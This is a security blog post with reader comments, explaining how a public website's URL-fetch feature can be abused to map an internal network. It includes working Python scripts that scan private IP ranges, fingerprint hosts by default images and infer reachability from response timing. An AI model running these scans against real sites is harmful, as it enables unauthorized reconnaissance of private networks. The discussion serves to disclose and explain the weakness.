web application security lab

Paper on Hacking Intranets Using Websites (Not Web Browsers)

This paper has been a long time coming, and I apologize for not getting it out sooner, but I’ve been very swamped. We’ve all known for a long time that we can force websites like Google to perform attacks on our behalf by getting them to surf random websites and perform RFI attacks, for instance. That’s bad. But what if we were to turn the concept around and instead use it to hack intranets? Herein lies the basis for intranet hacking using websites. I threw the paper up on SecTheory for anyone who wants to read it.

If you recall all our intranet-hacking-with-browsers conversations over the last two years, this will look really familiar, because it’s using all the same tactics, except instead it’s the webserver doing the attacking, rather than the web-browser. The paper draws on techniques and tactics we all know and love, so there shouldn’t be anything surprising in here. So the next question is: how prevalent is this stuff? Well, I’ve seen it exactly one time. But I’ve only tried it a handful of times, so it’s really hard for me to estimate how often it happens. My guess is that it is somewhat rare, but using Google dorks to identify potentially vulnerable sites would speed up untargeted attacks considerably. Kinda nasty.
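
To make the moving parts concrete, here’s a minimal sketch (in Python) of the request flow the paper describes. Everything named here is a hypothetical stand-in: the endpoint, the “img” parameter, and www.company.com just represent some site feature that fetches a URL on the visitor’s behalf. The point is only that it’s the web server, not the browser, that ends up talking to the RFC 1918 address.

    import urllib.parse
    import urllib.request

    # Hypothetical public site with a "fetch this URL for me" feature
    # (an avatar importer, RSS fetcher, "add image by URL" form, etc.).
    PUBLIC_SITE = "http://www.company.com/avatar"

    def probe_via_site(internal_url):
        """Ask the public site to fetch an internal URL and report what came back."""
        qs = urllib.parse.urlencode({"img": internal_url})
        with urllib.request.urlopen(PUBLIC_SITE + "?" + qs, timeout=15) as resp:
            body = resp.read()
        return resp.status, len(body)

    if __name__ == "__main__":
        # The attacker never touches 192.168.0.1 directly; the web server does.
        status, size = probe_via_site("http://192.168.0.1/")
        print("server-side fetch returned HTTP %d, %d bytes" % (status, size))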

21 Responses to “Paper on Hacking Intranets Using Websites (Not Web Browsers)”

  1. Chad Grant Says:

    Appears to be some typos in those IPs, not sure if that was on purpose.

  2. DoctorDan Says:

    Good read! This concept is certainly something to consider, yet often overlooked. I’ll be looking into this more for sure. I expect we will be hearing of such attacks more commonly in the near future. Pretty scary, actually. It’s time to turn the LAMP on and experiment =D

    Thanks!
    -Dan

  3. kuza55 Says:

    I’ve played around with similar ideas against proxies, but I’ve never thought of applying it to web servers, thanks for the paper/idea, :D

    Though personally I would have thought most boxes would be firewalled so they can’t send traffic anywhere other than the database, since you generally don’t want them connecting back out; but I guess that’s not workable in some cases.

    Anyway, have you seen any applications of this in the wild (i.e. companies running software which allows GET requests), and if so what kind of software was it, forum software, wiki software….?

  4. kuza55 Says:

    Also, on a similar note, have you by any chance seen misconfigured reverse proxy setups where you are able to get access to unhardened development machines because the reverse proxy was not set up to only allow access to public websites?

  5. drear Says:

    I must say that this paper was a disappointment to me.

    Quoting RSnake: “If you recall all our intranet-hacking-with-browsers conversations over the last two years, this will look really familiar, because it’s using all the same tactics, except instead it’s the webserver doing the attacking, rather than the web-browser”, and therefore it hardly reveals anything new.

    Can one really unwrap something new by replacing a few addresses? And since when were the concepts surrounding DMZs new? Back in 1994? The paper also makes far too many assumptions, and every single conclusion could be countered by standard ingress/egress filtering at layers well below 7.

  6. Schmoilito Says:

    In my former life as a support engineer for a reverse proxy/WAF, I’ve seen and fixed quite a few misconfigurations that would lead to such vulnerabilities. So I don’t doubt that they exist in the wild.

  7. RSnake Says:

    @chad - whoops, global search and replace gone wild. Thanks, I fixed that!

    @kuza55 - I have encountered a few messed up proxies, but I find far fewer companies use them than I would have originally thought. Probably because there are many other ways to do most of what a proxy provides. I bet the scanner guys could give you more information there though. They see a lot more of that kind of stuff than I would.

    @drear - sorry you didn’t see much new there - it was just a complicated thing to explain, which is why it needed a paper instead of a blog post. You’re right, there is not a whole lot that is new here, although I’ve never heard anyone talk about it before. But I assure you that I have seen this attack work in the wild. And to answer your last question, yes, a properly configured network would solve all of this. It just so happens that lots of networks are improperly configured (see Schmoilito’s comment). The same is true of almost any vulnerability though - if you built it correctly there wouldn’t be an issue (which is kind of a ridiculous thing to say anyway).

  8. hackathology Says:

    I like this article, but there are a few typos. That is minor stuff, however. The thing is, RSnake should not confuse users by having both the internal and external IPs start with 192; an external IP would start with something like 193. Also, I don’t quite understand the whole imaging part. The concept is there, but I still don’t get the default picture in the imaging part. Overall this article is not badly written; at least there was an effort.

  9. RSnake Says:

    I’m not sure what you’re saying, hackathology - all the IPs mentioned in this article were supposed to be internal; there are no external addresses other than the attacker’s and whatever www.company.com resolves to. What don’t you get about the diagram? Just to be clear, this isn’t about users accidentally hacking themselves, this is about a website leaving a hole that can be used to hack other machines behind its firewall.

  10. DoctorDan Says:

    @RSnake, I think hackathology was referring to the default image example which reveals the intranet to the attacker. I don’t think he means the diagram.

    I’m still somewhat stumped as to how the intranet is connected to and port swept.

    -Dan

  11. RSnake Says:

    Maybe this image will make it more clear… Take a look: http://www.sectheory.com/static/images/upload.png

    You use the server to connect for you. Port sweeping may not work, unless it’s only port 80 you are connecting to, because most of the time these types of programs don’t have great error messages. Although Jeremiah did mention you may be able to do something tricky like use timing attacks - which has the side effect of not being restricted by egress filtering if all you are after is the IP space they are in.

  12. hackathology Says:

    Hi RSnake, DoctorDan is right, what I meant was the default image example. The diagram itself is easy to understand. I just don’t understand how default images lead to port sweeping and fingerprinting.

  13. RSnake Says:

    Default images live on servers; in the case I gave, I used a default Apache image. You scan the whole IP range for that default image, like so:

    http://192.168.0.1/path.to/defaultimage.jpg
    http://192.168.0.2/path.to/defaultimage.jpg
    http://192.168.0.3/path.to/defaultimage.jpg
    http://192.168.0.4/path.to/defaultimage.jpg

    If the image comes back, you know the host is running whatever that software is. The examples I gave were Apache and WordPress. Once you know a server is there (using default IIS or Apache images) you can narrow that down to default images of software packages residing on those hosts, like WordPress, MediaWiki, or whatever. Understand?
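
    A rough sketch of how that sweep could be automated, assuming the same kind of hypothetical “img” fetch parameter sketched earlier in the post; the default-image paths below are illustrative fingerprints, not a complete list:

        import ipaddress
        import urllib.parse
        import urllib.request

        PUBLIC_SITE = "http://www.company.com/avatar"   # hypothetical vulnerable fetch endpoint

        # Default images that identify a package if the server-side fetch succeeds.
        # These paths are illustrative examples, not an exhaustive fingerprint list.
        FINGERPRINTS = {
            "Apache":    "icons/apache_pb.gif",
            "WordPress": "wp-includes/images/blank.gif",
        }

        def sweep(network):
            for host in ipaddress.ip_network(network).hosts():
                for name, path in FINGERPRINTS.items():
                    qs = urllib.parse.urlencode({"img": "http://%s/%s" % (host, path)})
                    try:
                        with urllib.request.urlopen(PUBLIC_SITE + "?" + qs, timeout=10) as resp:
                            if resp.status == 200 and resp.read(3) == b"GIF":
                                print("%s: looks like %s (served %s)" % (host, name, path))
                    except OSError:
                        pass  # host unreachable, or the site refused to fetch it

        if __name__ == "__main__":
            sweep("192.168.0.0/28")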

  14. DoctorDan Says:

    Thanks a lot! I understand it now. An image is worth a thousand words of explanation, sometimes. I can see how this could readily become automated as well. Really, some dangerous stuff!

  15. Ronald Says:

    @RSnake
    Good job, looks slick and was a good read.

    @drear
    Every attack has been known since the 1970s; that doesn’t mean you can’t make mashups. I haven’t seen anything new in AppSec since, let’s say, 1996. Stuff got a name, yes. ;)

  16. kuza55 Says:

    @RSnake:
    Would it also work to just request http://192.168.0.1/ instead of the image, and try to differentiate between host not reachable, and a non-image file returned?

    If they only returned a generic “error occurred” message, would timing attacks be relevant? IIRC sockets take a while to time out, and things on the local net should respond very quickly. There might be issues with how long your packet takes to get there, but I’m sure you could easily establish a baseline by, e.g., getting it to make a request to itself for a non-image file (i.e. http://127.0.0.1/) to measure how long it takes for your request to get there plus how long it takes to verify whether it’s an image or not, and then assume that if a request takes much longer than that, the target is probably not reachable. But that’s just a guess, and I don’t have the lab to test it….
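
    A small sketch of that baseline idea, again against the hypothetical fetch endpoint used in the earlier examples; the 5-second threshold is an arbitrary guess that would need tuning per application:

        import time
        import urllib.parse
        import urllib.request

        PUBLIC_SITE = "http://www.company.com/avatar"   # hypothetical vulnerable fetch endpoint

        def timed_fetch(internal_url):
            """Return how long the public site takes to answer when asked to fetch internal_url."""
            qs = urllib.parse.urlencode({"img": internal_url})
            start = time.monotonic()
            try:
                urllib.request.urlopen(PUBLIC_SITE + "?" + qs, timeout=60).read()
            except OSError:
                pass  # we only care how long the server held the connection open
            return time.monotonic() - start

        if __name__ == "__main__":
            # Baseline: a fetch that resolves instantly on the server itself.
            baseline = timed_fetch("http://127.0.0.1/")
            for host in ("192.168.0.1", "192.168.0.2", "192.168.0.3"):
                delta = timed_fetch("http://%s/" % host) - baseline
                verdict = "probably filtered/down" if delta > 5.0 else "probably reachable"
                print("%s: +%.2fs over baseline -> %s" % (host, delta, verdict))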

  17. hackathology Says:

    Understood now. Thanks, RSnake.

  18. RSnake Says:

    @kuza55 - I think that totally depends on the implementation of the software on the web server. Some may have totally different results than others, but thankfully there’s an easy way to check. Have it connect out to the web for servers that are there or aren’t there, and see how long it takes and what the error messages look like. I bet there are some that will respond differently depending on the situation (three states instead of two):

    1) found the image
    2) found something that’s not an image
    3) cannot connect to the URL in question

    That would definitely make things easier than:

    1) found the image
    2) sorry, didn’t work

    In that case, timing attacks now become more relevant, and I think you could make a case for it.
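
    For what it’s worth, here is a sketch of that three-state check against the same hypothetical fetch endpoint as in the earlier examples. The “could not connect” marker is invented; in practice you would first probe known-good and known-bad hosts on the public web, as suggested above, to learn what each state looks like for the application at hand:

        import urllib.parse
        import urllib.request

        PUBLIC_SITE = "http://www.company.com/avatar"   # hypothetical vulnerable fetch endpoint

        def classify(internal_url):
            """Bucket the application's response into the three states described above."""
            qs = urllib.parse.urlencode({"img": internal_url})
            try:
                with urllib.request.urlopen(PUBLIC_SITE + "?" + qs, timeout=30) as resp:
                    body = resp.read()
            except OSError:
                return "no answer from the public site itself"
            if body[:4] in (b"GIF8", b"\x89PNG", b"\xff\xd8\xff\xe0"):  # common image magic bytes
                return "found the image"                        # state 1
            if b"could not connect" in body.lower():            # invented error marker
                return "cannot connect to the URL in question"  # state 3
            return "found something that's not an image"        # state 2

        if __name__ == "__main__":
            print(classify("http://192.168.0.1/path.to/defaultimage.jpg"))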

  19. Michael Says:

    Hey FYI, McAfee site advisor just popped up for me, link below:
    http://www.siteadvisor.com/sites/ckers.org?aff_id=105-74&suite=true&premium=false&client_ver=ie_2.4.6066.0&client_type=IEPlugin

  20. drear Says:

    @RSnake: well, perhaps I was more disappointed with the paper itself than with the concepts, which, if we assume a badly configured network, are there. Still, the paper could have covered the topic better, since in a way it multiplies the risk factor, given that, as usual, when one host collapses, the rest soon follow.

    @Ronald: ditto, and well, the fundamental issues we are dealing with here were actually new a few years back or so, at least to the masses.

    If we are really dealing with a network that needs to spawn HTTP requests to multiple servers, it would be reasonable, perhaps, to assume something like FastCGI to begin with. So think of the common setup in which Apache is merely the front end and everything else is handled by something else, possibly somewhere else. Having a server on the localhost hardly changes anything, but would the timings still make sense if the FastCGI or related Rails application on the localhost is the one that spawns everything to the internal network? I guess so.

  21. RSnake Says:

    @drear - I’m still not sure I understand your complaint. You didn’t like the paper because I didn’t completely discuss why it’s bad to have a misconfigured network? You yourself pointed out that that part of the problem has been known since 1994 and isn’t worth discussing. Am I just not understanding what you’re saying? I’d happily clarify whatever you think is missing from the paper, if I could figure out what it is you didn’t like.